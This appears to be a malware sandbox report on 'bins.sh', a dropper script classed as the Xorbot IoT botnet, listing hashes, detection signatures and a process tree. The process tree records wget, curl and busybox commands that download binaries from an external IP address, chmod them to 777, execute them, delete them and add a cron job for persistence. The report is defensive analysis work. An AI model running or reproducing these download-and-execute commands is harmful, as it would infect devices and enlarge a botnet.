Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

10

bins.sh

debian-9-armhf

10

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    161s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    28/02/2025, 08:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    ef10152fac7e93f56a68778af04b375b

  • SHA1

    4270c209c09005b135f3588743b2be59883954db

  • SHA256

    09f4674d9d2939b651ef917948770c92e3466dc2a6c7c1aef1636178154cf1a4

  • SHA512

    60b92d328a0130a183580bc25aa252a86534a66943b4a906f0bc3881fe8667c4270f12e7b7e9c37748512c3c620a25c4fdfbf3e4ff5aec4f606ab03772254f40

  • SSDEEP

    192:S9jIb8YgcVAQQceCjhVH5J85tPhVh0Yg0AQQceCvu:SJIFVAQQceCH5K5bAQQceC2

Score
10/10
xorbotantivmbotnetdefense_evasiondiscoveryexecutionpersistenceprivilege_escalationtrojan

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
    botnettrojan
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

    botnettrojanxorbot
  • Xorbot family
    xorbot
  • Contacts a large (2138) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 2 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalation
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 6 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    PID:647
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:649
      • /usr/bin/wget
        wget http://37.44.238.88/bins/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
        2⤵
        • Writes file to tmp directory
        PID:651
      • /usr/bin/curl
        curl -O http://37.44.238.88/bins/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
        2⤵
        • Checks CPU configuration
        • Writes file to tmp directory
        PID:669
      • /bin/busybox
        /bin/busybox wget http://37.44.238.88/bins/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
        2⤵
        • Writes file to tmp directory
        PID:676
      • /bin/chmod
        chmod 777 6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
        2⤵
        • File and Directory Permissions Modification
        PID:678
      • /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
        ./6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
        2⤵
          PID:679
        • /bin/rm
          rm 6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
          2⤵
            PID:683
          • /usr/bin/wget
            wget http://37.44.238.88/bins/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
            2⤵
            • Writes file to tmp directory
            PID:684
          • /usr/bin/curl
            curl -O http://37.44.238.88/bins/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:686
          • /bin/busybox
            /bin/busybox wget http://37.44.238.88/bins/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
            2⤵
            • Writes file to tmp directory
            PID:693
          • /bin/chmod
            chmod 777 HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
            2⤵
            • File and Directory Permissions Modification
            PID:696
          • /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
            ./HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
            2⤵
            • Renames itself
            • Reads runtime system information
            PID:698
            • /bin/sh
              sh -c "crontab -l"
              3⤵
                PID:700
                • /usr/bin/crontab
                  crontab -l
                  4⤵
                  • Reads runtime system information
                  PID:702
              • /bin/sh
                sh -c "crontab -"
                3⤵
                  PID:703
                  • /usr/bin/crontab
                    crontab -
                    4⤵
                    • Creates/modifies Cron job
                    PID:705
              • /bin/rm
                rm HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
                2⤵
                  PID:718
                • /usr/bin/wget
                  wget http://37.44.238.88/bins/hWHYBvRhtT1f8VRbCvqxcgu6yhHX0Fv0kt
                  2⤵
                    PID:722

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
                  Filesize

                  122KB

                  MD5

                  cd3d4b9c643e5b473fb4d88ed05f0716

                  SHA1

                  64ee7a97418583d759eaea8000890cc3bae1b5f4

                  SHA256

                  0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944

                  SHA512

                  164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52

                  Download Submit

                • /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
                  Filesize

                  177KB

                  MD5

                  786d75a158fe731feca3880f436082c0

                  SHA1

                  79ea2734e43d00cdeabed5586b2c1994d02aef3e

                  SHA256

                  5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

                  SHA512

                  7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

                  Download Submit

                • /var/spool/cron/crontabs/tmp.PCvaHV
                  Filesize

                  210B

                  MD5

                  f809326a9910c69f8de182c37dfec4f5

                  SHA1

                  e50747c3475aa60c83c11c49357b389b053e8d68

                  SHA256

                  2ec2c62082cf967eaa31b41e8554a58a3c1d5d30d8e297b684e66807b2dae37a

                  SHA512

                  a0194a1a7003c0b91e6125df5579414b76a8bfa65b745aec584300b0fe640c1115000c78b5e030f6a421bbe5d929a71b92a0b61de082710115872d117dd992a5

                  Download Submit